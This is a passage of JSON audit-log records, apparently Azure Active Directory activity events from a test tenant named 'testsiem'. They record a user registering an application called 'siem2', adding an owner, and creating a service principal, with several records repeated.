"ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": 
"Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "AppId", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "AvailableToOtherTenants", "OldValue": "[]", "NewValue": "[\r\n false\r\n]"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n \"siem2\"\r\n]"}, {"NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "OldValue": "[]", "Name": "RequiredResourceAccess"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": 
"[\"AppId\",\"AvailableToOtherTenants\",\"DisplayName\",\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.6833528Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554400"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add application.", "Id": "689aaff0-b34f-4077-9244-0563b9f9c03b"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": 
"User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "AppId", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "AvailableToOtherTenants", "OldValue": "[]", "NewValue": "[\r\n false\r\n]"}, {"NewValue": "[\r\n \"siem2\"\r\n]", "OldValue": "[]", "Name": "DisplayName"}, {"Name": "RequiredResourceAccess", "OldValue": "[]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": 
"MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AppId\",\"AvailableToOtherTenants\",\"DisplayName\",\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.6833528Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554400"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add application.", "Id": "689aaff0-b34f-4077-9244-0563b9f9c03b"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": 
"2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "AppId", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"NewValue": "[\r\n false\r\n]", "OldValue": "[]", "Name": "AvailableToOtherTenants"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n \"siem2\"\r\n]"}, {"Name": "RequiredResourceAccess", "OldValue": "[]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": 
"actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AppId\",\"AvailableToOtherTenants\",\"DisplayName\",\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.6833528Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554400"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": 
"env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add application.", "Id": "689aaff0-b34f-4077-9244-0563b9f9c03b"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "ObjectId": "asr@testsiem.onmicrosoft.com", "ModifiedProperties": [{"Name": "Application.ObjectID", "OldValue": "", "NewValue": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "Application.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "Application.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": 
"actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "targetPUID", "Value": "1003200096971F55"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"Application.ObjectID\",\"Application.DisplayName\",\"Application.AppId\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"Application\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.7383513Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554439"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": 
"restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add owner to application.", "Id": "ccbe264f-f6bc-42bd-b5b6-2893ce2f465f"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:31", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "AccountEnabled", "OldValue": "[]", "NewValue": "[\r\n true\r\n]"}, {"Name": "AppPrincipalId", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n \"siem2\"\r\n]"}, {"Name": "ServicePrincipalName", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "Credential", "OldValue": "[]", 
"NewValue": "[\r\n {\r\n \"CredentialType\": 2,\r\n \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n \"KeyGroupId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AccountEnabled\",\"AppPrincipalId\",\"DisplayName\",\"ServicePrincipalName\",\"Credential\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "381d015d-6660-4dce-af99-4cd8c3b61d4d"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": 
"2020-02-11T16:36:31.1327910Z"}, {"Name": "env_epoch", "Value": "NNJOH"}, {"Name": "env_seqNum", "Value": "39121960"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add service principal.", "Id": "48403af8-b712-4e63-a999-686b631240ac"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:31", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, 
"ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "AccountEnabled", "OldValue": "[]", "NewValue": "[\r\n true\r\n]"}, {"Name": "AppPrincipalId", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"NewValue": "[\r\n \"siem2\"\r\n]", "OldValue": "[]", "Name": "DisplayName"}, {"Name": "ServicePrincipalName", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"NewValue": "[\r\n {\r\n \"CredentialType\": 2,\r\n \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n \"KeyGroupId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n }\r\n]", "OldValue": "[]", "Name": "Credential"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", 
"Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AccountEnabled\",\"AppPrincipalId\",\"DisplayName\",\"ServicePrincipalName\",\"Credential\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "381d015d-6660-4dce-af99-4cd8c3b61d4d"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:31.1327910Z"}, {"Name": "env_epoch", "Value": "NNJOH"}, {"Name": "env_seqNum", "Value": "39121960"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": 